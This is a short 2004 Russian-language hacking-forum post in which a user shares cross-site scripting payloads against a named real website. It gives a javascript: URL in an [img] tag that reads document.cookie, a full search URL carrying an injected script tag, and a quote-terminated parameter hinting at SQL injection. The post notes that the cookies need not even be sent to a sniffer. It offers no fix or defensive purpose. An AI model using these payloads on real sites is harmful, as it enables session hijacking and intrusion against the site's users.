26.12.2004, 14:12
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
На форуме есть xss в теге [img]
Код HTML:
[img]javascript:alert(document.cookie);[/img]
+ еще xss в поиске:
Код:
http://prepod.km.ru/forum/search.php?text_poisk=%3Cscript%3Ejavascript:alert();%3C/script%3E
Тут куки даже на сниффер высылать не надо ...
К тому же можно было покопаться с http://prepod.km.ru/forum/forum_tems.php?t=1&cat='
Но тут все гораздо проще ...
Последний раз редактировалось Че Гевара; 27.12.2004 в 17:43..
|
|
|